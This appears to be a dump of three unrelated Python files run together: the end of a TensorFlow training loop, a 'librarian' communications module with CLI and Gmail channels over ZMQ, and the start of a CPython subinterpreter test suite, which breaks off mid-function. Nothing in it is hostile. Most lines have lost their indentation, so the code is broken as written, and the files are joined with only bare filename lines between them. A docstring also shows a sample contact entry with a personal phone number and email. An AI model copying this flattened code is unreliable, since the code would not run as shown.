sum_loss += cur_loss
if it % min(report_interval, save_interval) == 0:
logstr = "it %06i [%09i pairs seen], AvgDiff: %.2f, FracDiffPos: %.3f, FracDiff%.2f: %.3f, PNorm: %.2f, GNorm: %.2f, Loss: %.4f" % \
(it, it*batch_size*2, sum_diff / (report_interval * batch_size),
sum_diff_is_pos / (report_interval * batch_size),
min_separation, sum_diff_is_big / (report_interval * batch_size),
pnorm, sum_gnorm / report_interval,
sum_loss / report_interval)
hist_fid.write(logstr + "\n")
print(logstr)
sys.stdout.flush()
sum_diff, sum_gnorm, sum_perfrank = 0.0, 0.0, 0.0
sum_loss, sum_diff_is_pos, sum_diff_is_big = 0.0, 0.0, 0.0
print('Ex: {:.2f}>>{:.2f} -> diff = {:.2f}'.format(
cur_score[0], cur_score[1], cur_diff[0]))
print('Ex: ID{} === {}>>{}'.format(
ids_batch[0], src_batch[0], src_batch[1]))
sys.stdout.flush()
if it % save_interval == 0:
lr *= 0.9
saver.save(session, opts.save_path + "/model.ckpt", global_step=it)
print "Model Saved! Decaying learning rate"
if it >= max(min_iterations, max_save * save_interval):
coord.request_stop()
except Exception as e:
print e
coord.request_stop(e)
finally:
if not test and not interactive_mode:
saver.save(session, opts.save_path + "/model.final")
hist_fid.close()
coord.request_stop()
coord.join(all_threads)
        try:
            # 'processes' is never defined in this script (leftover from a
            # multiprocessing-based reader), so this join is effectively a no-op
            [p.join() for p in processes]
        except Exception:
            pass
communications.py
"""communications: communications classes and programs for librarian
In addition to defining various communication classes, some functions are
intended to be run in separate standalone programs, with an appropriate
"__main__" clause. See CLI_chat.py as an example.
Copyright (c) 2018 by Jeff Bass.
License: MIT, see LICENSE for more details.
"""
import csv
import sys
import pprint
import logging
import threading
from time import sleep
from pathlib import Path
from collections import namedtuple
from helpers.comms.gmail import Gmail
from imagezmq import ImageHub, ImageSender
from queue import Queue, Empty, Full
from collections import deque
logger = logging.getLogger(__name__)
class QueryReceiver(ImageHub):
def __init__(self, open_port='tcp://127.0.0.1:5555', REQ_REP = True):
ImageHub.__init__(self, open_port=open_port)
def receive_query(self):
query, buf = self.recv_jpg()
return query # may return buf (binary buffer) in further development
class CommChannel:
""" Methods and attributes for a communications channel
Sets up a single communication channel, by creating an input method
that is specific to this channel using its settings. Then starts an
input thread and an output thread specific to this channel.
Each communications channel has its own unique versions of these 8 items:
1. channel.query_q to hold queries from channel until needed by Librarian
2. channel.reply_q to hold replies from Librarian to send via channel
3. channel.next_query method that returns next item in queries queue
4. channel.send_reply to send reply or new message via channel:
- In reply to a query
- To initiate a new conversation
(Most conversations are started by a User; but sometimes Librarian
will need to start a conversation, e.g., to send a timed reminder)
5. Thread for fetching input and putting it into query queue
    6. Thread for receiving output and putting it into reply queue
7. Sender_ID, if known by input method (None, if not)
8. Sending program or process. For example, the CLI channel will need
the user to start a "CLI_chat.py" program that uses ZMQ to send
and receive messages. Sender programs are this same Communications
module.
Parameters:
channel (str): Channel name from settings yaml communications section.
Example channels include gmail and CLI, but can also
include audio
        details (dict): Channel options & details specified for this channel
"""
def __init__(self, settings, comm_channel, details):
# print('channel, details', channel)
# pprint.pprint(details)
self.query_q = None # replaced with a specific queue by channel setup
self.reply_q = None # ditto
if comm_channel.lower().strip() == 'gmail': # set up gmail
self.setup_gmail(settings, comm_channel, details)
elif comm_channel.lower().strip() == 'cli': # command line interface
self.setup_cli(comm_channel, details)
else:
raise YamlOptionsError('Unknown comm channel in yaml file.')
def next_query(self):
""" next_query: return the next query to Librarian
For each communication channel instance, this instance method gets
the next query in the queue for the channel. This assumes that each
channel must have a method or a thread that loads all inbound queries
for that channel.
Returns:
next item from self.query_q OR None if self.query_q is empty
"""
try:
query = self.query_q.get(block=False)
except Empty:
return None
else:
return query
def send_reply(self, reply):
""" send_reply: push the reply from the Librarian onto reply queue
        This is a placeholder method. It will be replaced with a channel
specific method as each channel is initialized.
Parameters:
            reply: reply from Librarian to be sent back via the channel
"""
pass # this method will be replaced with channel specific methods
def close(self):
""" close the communications channel
        This is a placeholder method. It will be replaced with a channel
specific close method as each channel is initialized.
"""
pass
def setup_cli(self, comm_channel, details):
""" setup_cli: set up the "8 items" for the CLI comm channel
Parameters:
comm_channel (dict): The dictionary holding options for CLI
            details (dict): individual options in comm_channel
"""
# print the parameters to make sure they are what you think they are
# print('Contents of comm_channel:')
# pprint.pprint(comm_channel)
# print('Contents of details:')
# pprint.pprint(details)
self.name = 'CLI'
self.port = details.get('port', 5556) # CLI ZMQ port
maxsize = 2 # only need minimal queue for CLI
# first, set up query queue and start a query thread
self.query_q = Queue(maxsize=maxsize)
self.address = 'tcp://127.0.0.1:' + str(self.port).strip()
# print('CLI hub address is:', self.address)
self.q_r = QueryReceiver(open_port=self.address)
        # start the thread to receive CLI queries and put them into self.query_q
t = threading.Thread(target=self.CLI_query_put)
# print('Starting CLI threading')
t.daemon = True # allows this thread to be auto-killed on program exit
t.name = 'CLI QueryReceiver' # naming the thread helps with debugging
t.start()
# next, set up send_reply function specific to CLI.
self.reply_q = Queue(maxsize=maxsize) # queue for ZMQ REP replies
self.send_reply = self.CLI_send_reply # specific CLI_send_reply method
# finally, set the specific close function for CLI
self.close = self.q_r.close
def CLI_query_put(self):
""" CLI_query_put: receive query via QueryReceiver; put into self.query_q
Receives inbound CLI query from CLI_chat.py which runs as a separate
        program. This method runs in a Thread, loops forever and puts every
query received into the Librarian query_q. Waits until reply has been
sent (via ZMQ REP portion of REQ/REP cycle) before next receive_query.
"""
while True:
query = self.q_r.receive_query() # will block until CLI query recvd
self.query_q.put(query)
# Need to block here until REP has been sent in CLI_send_reply
self.OK = self.reply_q.get(block=True) # wait for reply...
# got the OK from CLI_send_reply so can fetch the next query
def CLI_send_reply(self, reply):
""" send_reply: push the CLI reply from the Librarian onto reply queue
Because only one CLI sender / receiver can exist at a time on a single
ZMQ port, there is no need for a reply queue. The reply is sent as the
REP portion of the ZMQ REQ/REP message pair
Parameters:
reply: reply from Librarian to be sent back to the CLI channel
"""
reply = reply.encode() # convert string to bytes to make ZMQ happy
self.q_r.send_reply(reply) # sends reply via ZMQ REP
self.reply_q.put('OK') # having sent the ZMQ REP, put OK into reply_q
# so that next REQ can be fetched in CLI_query_put()
def setup_gmail(self, settings, comm_channel, details):
""" setup_gmail: set up the "8 items" for the gmail comm channel
Parameters:
comm_channel (dict): The dictionary holding options for gmail
            details (dict): individual options in comm_channel
"""
# print the parameters to make sure they are what you think they are
# print('Contents of comm_channel:')
# pprint.pprint(comm_channel)
# print('Contents of details:')
# pprint.pprint(details)
self.name = 'Gmail'
self.patience = settings.patience
self.port = details.get('port', 5559) # gmail ZMQ port
maxsize = 200 # size of Queue specific to Gmail queries
# first, set up query queue and start a query thread
self.address = 'tcp://127.0.0.1:' + str(self.port).strip()
# print('Gmail hub address is:', self.address)
self.q_r = QueryReceiver(open_port=self.address)
# start the process to receive gmail queries and put them into self.query_q
self.query_q = Queue(maxsize=maxsize)
t = threading.Thread(target=self.gmail_query_put)
# print('Starting gmail query receiver thread')
t.daemon = True # allows this thread to be auto-killed on program exit
t.name = 'Gmail QueryReceiver' # naming the thread helps with debugging
t.start()
        # Start python gmail.py to watch gmail & send inbound queries to above
        self.send_reply = self.gmail_send_reply # set a specific gmail method
# finally, set the specific close function for gmail
self.close = self.q_r.close
self.gmail = self.setup_gmail_sender(settings, details)
def gmail_query_put(self):
""" gmail_query_put: receive query via QueryReceiver; put into self.query_q
Receives inbound gmail query from gmail_watcher which runs as a separate
        process. This method runs in a Thread, loops forever and puts every
query received into the Librarian query_q.
"""
while True:
query = self.q_r.receive_query() # will block until gmail query recvd
self.query_q.put(query)
            self.q_r.send_reply(b'OK') # sends reply acknowledgment via ZMQ REP
def setup_gmail_sender(self, settings, details):
""" Instantiates a GMail instance to be used by gmail_send_reply().
Parameters:
settings (Settings object): holds the settings from the yaml file
"""
gmail = None
gmail_dir = settings.lib_dir / Path('gmail') # gmail directory
# self.contacts = details.get('contacts', 'contacts.txt')
# details = {'contacts': 'contacts.txt', 'port': '5559'}
contacts = self.get_contacts(gmail_dir, details)
phones_OK_list = [contact.mobile_phone for contact in contacts]
emails_OK_list = [contact.email for contact in contacts]
# print('Phones:', *phones_OK_list)
# print('Emails:', *emails_OK_list)
# print('Instantiating Gmail().')
# print()
gmail = Gmail(settings, details, use_q_s=False) # no QuerySender needed
return gmail
def gmail_send_reply(self, reply):
""" send reply to gmail using gmail api
"""
# print("Simulating sending a reply to gmail:", reply.split("|", 1)[0])
self.gmail.gmail_send_reply(self.gmail.gmail, reply)
return
def get_contacts(self, gmail_dir, details):
"""Gets contacts from contacts data file
Example lines from contacts.txt for reference
name|full_name|canonical_name|mobile_phone|email
Jeff|Jeff Bass|jeff_bass|8054697213|jeffbass@me.com
Returns:
contacts, a list of named tuples of contact info
Example of extracting a single line
[contact.mobile_phone for contact in contacts if contact.name=='Jeff']
['8054697213']
"""
contacts_file = details.get('contacts', 'contacts.txt')
contacts_file = gmail_dir / Path(contacts_file)
# print('contacts file:', contacts_file )
with open(contacts_file, 'r') as f:
# read header line and set up namedtuple
lines = csv.reader(f, delimiter='|')
# fields = lines.next() # field names list from first line in file
fields = next(lines) # field names list from first line in file
Contact = namedtuple('Contact', fields)
# read all lines in file, creating a named tuple for each line in file
# if len(line) > 0 avoids TypeError due to any blank lines at end of file
contacts = [Contact(*line) for line in lines if len(line) > 0]
return contacts
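# Minimal usage sketch (illustrative; 'settings' and the yaml-derived 'details'
# dict come from the Librarian program that owns these channels and are
# placeholders here):
#
#     channel = CommChannel(settings, 'CLI', details)
#     query = channel.next_query()      # None if nothing is waiting
#     if query is not None:
#         channel.send_reply('got it')
#     channel.close()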
test__xxsubinterpreters.py
from collections import namedtuple
import contextlib
import itertools
import os
import pickle
import sys
from textwrap import dedent
import threading
import time
import unittest
from test import support
from test.support import script_helper
interpreters = support.import_module('_xxsubinterpreters')
##################################
# helpers
def powerset(*sets):
    return itertools.chain.from_iterable(
        itertools.combinations(sets, r)
        for r in range(len(sets)+1))
def _captured_script(script):
r, w = os.pipe()
indented = script.replace('\n', '\n ')
wrapped = dedent(f"""
import contextlib
with open({w}, 'w') as spipe:
with contextlib.redirect_stdout(spipe):
{indented}
""")
return wrapped, open(r)
def _run_output(interp, request, shared=None):
script, rpipe = _captured_script(request)
with rpipe:
interpreters.run_string(interp, script, shared)
return rpipe.read()
@contextlib.contextmanager
def _running(interp):
r1, w1 = os.pipe()
r2, w2 = os.pipe()
def run():
interpreters.run_string(interp, dedent(f"""
# signal that we're started
with open({w1}, mode='wb', buffering=0) as wpipe:
wpipe.write(b'0')
# wait for "signal" to finish
with open({r2}, mode='rb', buffering=0) as rpipe:
rpipe.read(1)
"""))
t = threading.Thread(target=run)
t.start()
# Wait for t to start:
with open(r1, mode='rb', buffering=0) as rpipe:
rpipe.read(1)
yield
with open(w2, mode='wb', buffering=0) as wpipe:
wpipe.write(b'1')
t.join()
#@contextmanager
#def run_threaded(id, source, **shared):
# def run():
# run_interp(id, source, **shared)
# t = threading.Thread(target=run)
# t.start()
# yield
# t.join()
def run_interp(id, source, **shared):
_run_interp(id, source, shared)
def _run_interp(id, source, shared, _mainns={}):
source = dedent(source)
main = interpreters.get_main()
if main == id:
if interpreters.get_current() != main:
raise RuntimeError
# XXX Run a func?
exec(source, _mainns)
else:
interpreters.run_string(id, source, shared)
def run_interp_threaded(id, source, **shared):
    def run():
        _run_interp(id, source, shared)
    t = threading.Thread(target=run)
    t.start()
    t.join()
class Interpreter(namedtuple('Interpreter', 'name id')):
@classmethod
def from_raw(cls, raw):
if isinstance(raw, cls):
return raw
elif isinstance(raw, str):
return cls(raw)
else:
raise NotImplementedError
def __new__(cls, name=None, id=None):
main = interpreters.get_main()
if id == main:
if not name:
name = 'main'
elif name != 'main':
raise ValueError(
'name mismatch (expected "main", got "{}")'.format(name))
id = main
elif id is not None:
if not name:
name = 'interp'
elif name == 'main':
raise ValueError('name mismatch (unexpected "main")')
if not isinstance(id, interpreters.InterpreterID):
id = interpreters.InterpreterID(id)
elif not name or name == 'main':
name = 'main'
id = main
else:
id = interpreters.create()
self = super().__new__(cls, name, id)
return self
# XXX expect_channel_closed() is unnecessary once we improve exc propagation.
@contextlib.contextmanager
def expect_channel_closed():
try:
yield
except interpreters.ChannelClosedError:
pass
else:
assert False, 'channel not closed'
class ChannelAction(namedtuple('ChannelAction', 'action end interp')):
def __new__(cls, action, end=None, interp=None):
if not end:
end = 'both'
if not interp:
interp = 'main'
self = super().__new__(cls, action, end, interp)
return self
def __init__(self, *args, **kwargs):
if self.action == 'use':
if self.end not in ('same', 'opposite', 'send', 'recv'):
raise ValueError(self.end)
elif self.action in ('close', 'force-close'):
if self.end not in ('both', 'same', 'opposite', 'send', 'recv'):
raise ValueError(self.end)
else:
raise ValueError(self.action)
if self.interp not in ('main', 'same', 'other', 'extra'):
raise ValueError(self.interp)
def resolve_end(self, end):
if self.end == 'same':
return end
elif self.end == 'opposite':
return 'recv' if end == 'send' else 'send'
else:
return self.end
def resolve_interp(self, interp, other, extra):
if self.interp == 'same':
return interp
elif self.interp == 'other':
if other is None:
raise RuntimeError
return other
elif self.interp == 'extra':
if extra is None:
raise RuntimeError
return extra
elif self.interp == 'main':
if interp.name == 'main':
return interp
elif other and other.name == 'main':
return other
else:
raise RuntimeError
# Per __init__(), there aren't any others.
class ChannelState(namedtuple('ChannelState', 'pending closed')):
def __new__(cls, pending=0, *, closed=False):
self = super().__new__(cls, pending, closed)
return self
def incr(self):
return type(self)(self.pending + 1, closed=self.closed)
def decr(self):
return type(self)(self.pending - 1, closed=self.closed)
def close(self, *, force=True):
if self.closed:
if not force or self.pending == 0:
return self
return type(self)(0 if force else self.pending, closed=True)
def run_action(cid, action, end, state, *, hideclosed=True):
if state.closed:
if action == 'use' and end == 'recv' and state.pending:
expectfail = False
else:
expectfail = True
else:
expectfail = False
try:
result = _run_action(cid, action, end, state)
except interpreters.ChannelClosedError:
if not hideclosed and not expectfail:
raise
result = state.close()
else:
if expectfail:
raise ... # XXX
return result
def _run_action(cid, action, end, state):
if action == 'use':
if end == 'send':
interpreters.channel_send(cid, b'spam')
return state.incr()
elif end == 'recv':
if not state.pending:
try:
interpreters.channel_recv(cid)
except interpreters.ChannelEmptyError:
return state
else:
raise Exception('expected ChannelEmptyError')
else:
interpreters.channel_recv(cid)
return state.decr()
else:
raise ValueError(end)
elif action == 'close':
kwargs = {}
if end in ('recv', 'send'):
kwargs[end] = True
interpreters.channel_close(cid, **kwargs)
return state.close()
elif action == 'force-close':
kwargs = {
'force': True,
}
if end in ('recv', 'send'):
kwargs[end] = True
interpreters.channel_close(cid, **kwargs)
return state.close(force=True)
else:
raise ValueError(action)
def clean_up_interpreters():
for id in interpreters.list_all():
if id == 0: # main
continue
try:
interpreters.destroy(id)
except RuntimeError:
pass # already destroyed
def clean_up_channels():
for cid in interpreters.channel_list_all():
try:
interpreters.channel_destroy(cid)
except interpreters.ChannelNotFoundError:
pass # already destroyed
class TestBase(unittest.TestCase):
def tearDown(self):
clean_up_interpreters()
clean_up_channels()
##################################
# misc. tests
class IsShareableTests(unittest.TestCase):
def test_default_shareables(self):
shareables = [
# singletons
None,
# builtin objects
b'spam',
'spam',
10,
-10,
]
for obj in shareables:
with self.subTest(obj):
self.assertTrue(
interpreters.is_shareable(obj))
def test_not_shareable(self):
class Cheese:
def __init__(self, name):
self.name = name
def __str__(self):
return self.name
class SubBytes(bytes):
"""A subclass of a shareable type."""
not_shareables = [
# singletons
True,
False,
NotImplemented,
...,
# builtin types and objects
type,
object,
object(),
Exception(),
100.0,
# user-defined types and objects
Cheese,
Cheese('Wensleydale'),
SubBytes(b'spam'),
]
for obj in not_shareables:
with self.subTest(repr(obj)):
self.assertFalse(
interpreters.is_shareable(obj))
class ShareableTypeTests(unittest.TestCase):
def setUp(self):
super().setUp()
self.cid = interpreters.channel_create()
def tearDown(self):
interpreters.channel_destroy(self.cid)
super().tearDown()
def _assert_values(self, values):
for obj in values:
with self.subTest(obj):
interpreters.channel_send(self.cid, obj)
got = interpreters.channel_recv(self.cid)
self.assertEqual(got, obj)
self.assertIs(type(got), type(obj))
# XXX Check the following in the channel tests?
#self.assertIsNot(got, obj)
def test_singletons(self):
for obj in [None]:
with self.subTest(obj):
interpreters.channel_send(self.cid, obj)
got = interpreters.channel_recv(self.cid)
# XXX What about between interpreters?
self.assertIs(got, obj)
def test_types(self):
self._assert_values([
b'spam',
9999,
self.cid,
])
def test_bytes(self):
self._assert_values(i.to_bytes(2, 'little', signed=True)
for i in range(-1, 258))
def test_strs(self):
self._assert_values(['hello world', '你好世界', ''])
def test_int(self):
self._assert_values(itertools.chain(range(-1, 258),
[sys.maxsize, -sys.maxsize - 1]))
def test_non_shareable_int(self):
ints = [
sys.maxsize + 1,
-sys.maxsize - 2,
2**1000,
]
for i in ints:
with self.subTest(i):
with self.assertRaises(OverflowError):
interpreters.channel_send(self.cid, i)
##################################
# interpreter tests
@unittest.skipUnderCinderJITNotFullFrame("T74839308 - doesn't work in tiny-frame mode")
class ListAllTests(TestBase):
def test_initial(self):
main = interpreters.get_main()
ids = interpreters.list_all()
self.assertEqual(ids, [main])
def test_after_creating(self):
main = interpreters.get_main()
first = interpreters.create()
second = interpreters.create()
ids = interpreters.list_all()
self.assertEqual(ids, [main, first, second])
def test_after_destroying(self):
main = interpreters.get_main()
first = interpreters.create()
second = interpreters.create()
interpreters.destroy(first)
ids = interpreters.list_all()
self.assertEqual(ids, [main, second])
@unittest.skipUnderCinderJITNotFullFrame("T74839308 - doesn't work in tiny-frame mode")
class GetCurrentTests(TestBase):
def test_main(self):
main = interpreters.get_main()
cur = interpreters.get_current()
self.assertEqual(cur, main)
self.assertIsInstance(cur, interpreters.InterpreterID)
def test_subinterpreter(self):
main = interpreters.get_main()
interp = interpreters.create()
out = _run_output(interp, dedent("""
import _xxsubinterpreters as _interpreters
cur = _interpreters.get_current()
print(cur)
assert isinstance(cur, _interpreters.InterpreterID)
"""))
cur = int(out.strip())
_, expected = interpreters.list_all()
self.assertEqual(cur, expected)
self.assertNotEqual(cur, main)
@unittest.skipUnderCinderJITNotFullFrame("T74839308 - doesn't work in tiny-frame mode")
class GetMainTests(TestBase):
def test_from_main(self):
[expected] = interpreters.list_all()
main = interpreters.get_main()
self.assertEqual(main, expected)
self.assertIsInstance(main, interpreters.InterpreterID)
def test_from_subinterpreter(self):
[expected] = interpreters.list_all()
interp = interpreters.create()
out = _run_output(interp, dedent("""
import _xxsubinterpreters as _interpreters
main = _interpreters.get_main()
print(main)
assert isinstance(main, _interpreters.InterpreterID)
"""))
main = int(out.strip())
self.assertEqual(main, expected)
@unittest.skipUnderCinderJITNotFullFrame("T74839308 - doesn't work in tiny-frame mode")
class IsRunningTests(TestBase):
def test_main(self):
main = interpreters.get_main()
self.assertTrue(interpreters.is_running(main))
def test_subinterpreter(self):
interp = interpreters.create()
self.assertFalse(interpreters.is_running(interp))
with _running(interp):
self.assertTrue(interpreters.is_running(interp))
self.assertFalse(interpreters.is_running(interp))
def test_from_subinterpreter(self):
interp = interpreters.create()
out = _run_output(interp, dedent(f"""
import _xxsubinterpreters as _interpreters
if _interpreters.is_running({interp}):
print(True)
else:
print(False)
"""))
self.assertEqual(out.strip(), 'True')
def test_already_destroyed(self):
interp = interpreters.create()
interpreters.destroy(interp)
with self.assertRaises(RuntimeError):
interpreters.is_running(interp)
def test_does_not_exist(self):
with self.assertRaises(RuntimeError):
interpreters.is_running(1_000_000)
def test_bad_id(self):
with self.assertRaises(ValueError):
interpreters.is_running(-1)
@unittest.skipUnderCinderJITNotFullFrame("T74839308 - doesn't work in tiny-frame mode")
class InterpreterIDTests(TestBase):
def test_with_int(self):
id = interpreters.InterpreterID(10, force=True)
self.assertEqual(int(id), 10)
def test_coerce_id(self):
class Int(str):
def __index__(self):
return 10
id = interpreters.InterpreterID(Int(), force=True)
self.assertEqual(int(id), 10)
def test_bad_id(self):
self.assertRaises(TypeError, interpreters.InterpreterID, object())
self.assertRaises(TypeError, interpreters.InterpreterID, 10.0)
self.assertRaises(TypeError, interpreters.InterpreterID, '10')
self.assertRaises(TypeError, interpreters.InterpreterID, b'10')
self.assertRaises(ValueError, interpreters.InterpreterID, -1)
self.assertRaises(OverflowError, interpreters.InterpreterID, 2**64)
def test_does_not_exist(self):
id = interpreters.channel_create()
with self.assertRaises(RuntimeError):
interpreters.InterpreterID(int(id) + 1) # unforced
def test_str(self):
id = interpreters.InterpreterID(10, force=True)
self.assertEqual(str(id), '10')
def test_repr(self):
id = interpreters.InterpreterID(10, force=True)
self.assertEqual(repr(id), 'InterpreterID(10)')
def test_equality(self):
id1 = interpreters.create()
id2 = interpreters.InterpreterID(int(id1))
id3 = interpreters.create()
self.assertTrue(id1 == id1)
self.assertTrue(id1 == id2)
self.assertTrue(id1 == int(id1))
self.assertTrue(int(id1) == id1)
self.assertTrue(id1 == float(int(id1)))
self.assertTrue(float(int(id1)) == id1)
self.assertFalse(id1 == float(int(id1)) + 0.1)
self.assertFalse(id1 == str(int(id1)))
self.assertFalse(id1 == 2**1000)
self.assertFalse(id1 == float('inf'))
self.assertFalse(id1 == 'spam')
self.assertFalse(id1 == id3)
self.assertFalse(id1 != id1)
self.assertFalse(id1 != id2)
self.assertTrue(id1 != id3)
@unittest.skipUnderCinderJITNotFullFrame("T74839308 - doesn't work in tiny-frame mode")
class CreateTests(TestBase):
def test_in_main(self):
id = interpreters.create()
self.assertIsInstance(id, interpreters.InterpreterID)
self.assertIn(id, interpreters.list_all())
@unittest.skip('enable this test when working on pystate.c')
def test_unique_id(self):
seen = set()
for _ in range(100):
id = interpreters.create()
interpreters.destroy(id)
seen.add(id)
self.assertEqual(len(seen), 100)
def test_in_thread(self):
lock = threading.Lock()
id = None
def f():
nonlocal id
id = interpreters.create()
lock.acquire()
lock.release()
t = threading.Thread(target=f)
with lock:
t.start()
t.join()
self.assertIn(id, interpreters.list_all())
def test_in_subinterpreter(self):
main, = interpreters.list_all()
id1 = interpreters.create()
out = _run_output(id1, dedent("""
import _xxsubinterpreters as _interpreters
id = _interpreters.create()
print(id)
assert isinstance(id, _interpreters.InterpreterID)
"""))
id2 = int(out.strip())
self.assertEqual(set(interpreters.list_all()), {main, id1, id2})
def test_in_threaded_subinterpreter(self):
main, = interpreters.list_all()
id1 = interpreters.create()
id2 = None
def f():
nonlocal id2
out = _run_output(id1, dedent("""
import _xxsubinterpreters as _interpreters
id = _interpreters.create()
print(id)
"""))
id2 = int(out.strip())
t = threading.Thread(target=f)
t.start()
t.join()
self.assertEqual(set(interpreters.list_all()), {main, id1, id2})
def test_after_destroy_all(self):
before = set(interpreters.list_all())
# Create 3 subinterpreters.
ids = []
for _ in range(3):
id = interpreters.create()
ids.append(id)
# Now destroy them.
for id in ids:
interpreters.destroy(id)
# Finally, create another.
id = interpreters.create()
self.assertEqual(set(interpreters.list_all()), before | {id})
def test_after_destroy_some(self):
before = set(interpreters.list_all())
# Create 3 subinterpreters.
id1 = interpreters.create()
id2 = interpreters.create()
id3 = interpreters.create()
# Now destroy 2 of them.
interpreters.destroy(id1)
interpreters.destroy(id3)
# Finally, create another.
id = interpreters.create()
self.assertEqual(set(interpreters.list_all()), before | {id, id2})
@unittest.skipUnderCinderJITNotFullFrame("T74839308 - doesn't work in tiny-frame mode")
class DestroyTests(TestBase):
def test_one(self):
id1 = interpreters.create()
id2 = interpreters.create()
id3 = interpreters.create()
self.assertIn(id2, interpreters.list_all())
interpreters.destroy(id2)
self.assertNotIn(id2, interpreters.list_all())
self.assertIn(id1, interpreters.list_all())
self.assertIn(id3, interpreters.list_all())
def test_all(self):
before = set(interpreters.list_all())
ids = set()
for _ in range(3):
id = interpreters.create()
ids.add(id)
self.assertEqual(set(interpreters.list_all()), before | ids)
for id in ids:
interpreters.destroy(id)
self.assertEqual(set(interpreters.list_all()), before)
def test_main(self):
main, = interpreters.list_all()
with self.assertRaises(RuntimeError):
interpreters.destroy(main)
def f():
with self.assertRaises(RuntimeError):
interpreters.destroy(main)
t = threading.Thread(target=f)
t.start()
t.join()
def test_already_destroyed(self):
id = interpreters.create()
interpreters.destroy(id)
with self.assertRaises(RuntimeError):
interpreters.destroy(id)
def test_does_not_exist(self):
with self.assertRaises(RuntimeError):
interpreters.destroy(1_000_000)
def test_bad_id(self):
with self.assertRaises(ValueError):
interpreters.destroy(-1)
def test_from_current(self):
main, = interpreters.list_all()
id = interpreters.create()
script = dedent(f"""
import _xxsubinterpreters as _interpreters
try:
_interpreters.destroy({id})
except RuntimeError:
pass
""")
interpreters.run_string(id, script)
self.assertEqual(set(interpreters.list_all()), {main, id})
def test_from_sibling(self):
main, = interpreters.list_all()
id1 = interpreters.create()
id2 = interpreters.create()
script = dedent(f"""
import _xxsubinterpreters as _interpreters
_interpreters.destroy({id2})
""")
interpreters.run_string(id1, script)
self.assertEqual(set(interpreters.list_all()), {main, id1})
def test_from_other_thread(self):
id = interpreters.create()
def f():
interpreters.destroy(id)
t = threading.Thread(target=f)
t.start()
t.join()
def test_still_running(self):
main, = interpreters.list_all()
interp = interpreters.create()
with _running(interp):
self.assertTrue(interpreters.is_running(interp),
msg=f"Interp {interp} should be running before destruction.")
with self.assertRaises(RuntimeError,
msg=f"Should not be able to destroy interp {interp} while it's still running."):
interpreters.destroy(interp)
self.assertTrue(interpreters.is_running(interp))
@unittest.skipUnderCinderJITNotFullFrame("T74839308 - doesn't work in tiny-frame mode")
class RunStringTests(TestBase):
SCRIPT = dedent("""
with open('{}', 'w') as out:
out.write('{}')
""")
FILENAME = 'spam'
def setUp(self):
super().setUp()
self.id = interpreters.create()
self._fs = None
def tearDown(self):
if self._fs is not None:
self._fs.close()
super().tearDown()
@property
def fs(self):
if self._fs is None:
self._fs = FSFixture(self)
return self._fs
def test_success(self):
script, file = _captured_script('print("it worked!", end="")')
with file:
interpreters.run_string(self.id, script)
out = file.read()
self.assertEqual(out, 'it worked!')
def test_in_thread(self):
script, file = _captured_script('print("it worked!", end="")')
with file:
def f():
interpreters.run_string(self.id, script)
t = threading.Thread(target=f)
t.start()
t.join()
out = file.read()
self.assertEqual(out, 'it worked!')
def test_create_thread(self):
script, file = _captured_script("""
import threading
def f():
print('it worked!', end='')
t = threading.Thread(target=f)
t.start()
t.join()
""")
with file:
interpreters.run_string(self.id, script)
out = file.read()
self.assertEqual(out, 'it worked!')
@unittest.skipUnless(hasattr(os, 'fork'), "test needs os.fork()")
def test_fork(self):
import tempfile
with tempfile.NamedTemporaryFile('w+') as file:
file.write('')
file.flush()
expected = 'spam spam spam spam spam'
script = dedent(f"""
import os
try:
os.fork()
except RuntimeError:
with open('{file.name}', 'w') as out:
out.write('{expected}')
""")
interpreters.run_string(self.id, script)
file.seek(0)
content = file.read()
self.assertEqual(content, expected)
def test_already_running(self):
with _running(self.id):
with self.assertRaises(RuntimeError):
interpreters.run_string(self.id, 'print("spam")')
def test_does_not_exist(self):
id = 0
while id in interpreters.list_all():
id += 1
with self.assertRaises(RuntimeError):
interpreters.run_string(id, 'print("spam")')
def test_error_id(self):
with self.assertRaises(ValueError):
interpreters.run_string(-1, 'print("spam")')
def test_bad_id(self):
with self.assertRaises(TypeError):
interpreters.run_string('spam', 'print("spam")')
def test_bad_script(self):
with self.assertRaises(TypeError):
interpreters.run_string(self.id, 10)
def test_bytes_for_script(self):
with self.assertRaises(TypeError):
interpreters.run_string(self.id, b'print("spam")')
@contextlib.contextmanager
def assert_run_failed(self, exctype, msg=None):
with self.assertRaises(interpreters.RunFailedError) as caught:
yield
if msg is None:
self.assertEqual(str(caught.exception).split(':')[0],
str(exctype))
else:
self.assertEqual(str(caught.exception),
"{}: {}".format(exctype, msg))
def test_invalid_syntax(self):
with self.assert_run_failed(SyntaxError):
# missing close paren
interpreters.run_string(self.id, 'print("spam"')
def test_failure(self):
with self.assert_run_failed(Exception, 'spam'):
interpreters.run_string(self.id, 'raise Exception("spam")')
def test_SystemExit(self):
with self.assert_run_failed(SystemExit, '42'):
interpreters.run_string(self.id, 'raise SystemExit(42)')
def test_sys_exit(self):
with self.assert_run_failed(SystemExit):
interpreters.run_string(self.id, dedent("""
import sys
sys.exit()
"""))
with self.assert_run_failed(SystemExit, '42'):
interpreters.run_string(self.id, dedent("""
import sys
sys.exit(42)
"""))
def test_with_shared(self):
r, w = os.pipe()
shared = {
'spam': b'ham',
'eggs': b'-1',
'cheddar': None,
}
script = dedent(f"""
eggs = int(eggs)
spam = 42
result = spam + eggs
ns = dict(vars())
del ns['__builtins__']
import pickle
with open({w}, 'wb') as chan:
pickle.dump(ns, chan)
""")
interpreters.run_string(self.id, script, shared)
with open(r, 'rb') as chan:
ns = pickle.load(chan)
self.assertEqual(ns['spam'], 42)
self.assertEqual(ns['eggs'], -1)
self.assertEqual(ns['result'], 41)
self.assertIsNone(ns['cheddar'])
def test_shared_overwrites(self):
interpreters.run_string(self.id, dedent("""
spam = 'eggs'
ns1 = dict(vars())
del ns1['__builtins__']
"""))
shared = {'spam': b'ham'}
script = dedent(f"""
ns2 = dict(vars())
del ns2['__builtins__']
""")
interpreters.run_string(self.id, script, shared)
r, w = os.pipe()
script = dedent(f"""
ns = dict(vars())
del ns['__builtins__']
import pickle
with open({w}, 'wb') as chan:
pickle.dump(ns, chan)
""")
interpreters.run_string(self.id, script)
with open(r, 'rb') as chan:
ns = pickle.load(chan)
self.assertEqual(ns['ns1']['spam'], 'eggs')
self.assertEqual(ns['ns2']['spam'], b'ham')
self.assertEqual(ns['spam'], b'ham')
def test_shared_overwrites_default_vars(self):
r, w = os.pipe()
shared = {'__name__': b'not __main__'}
script = dedent(f"""
spam = 42
ns = dict(vars())
del ns['__builtins__']
import pickle
with open({w}, 'wb') as chan:
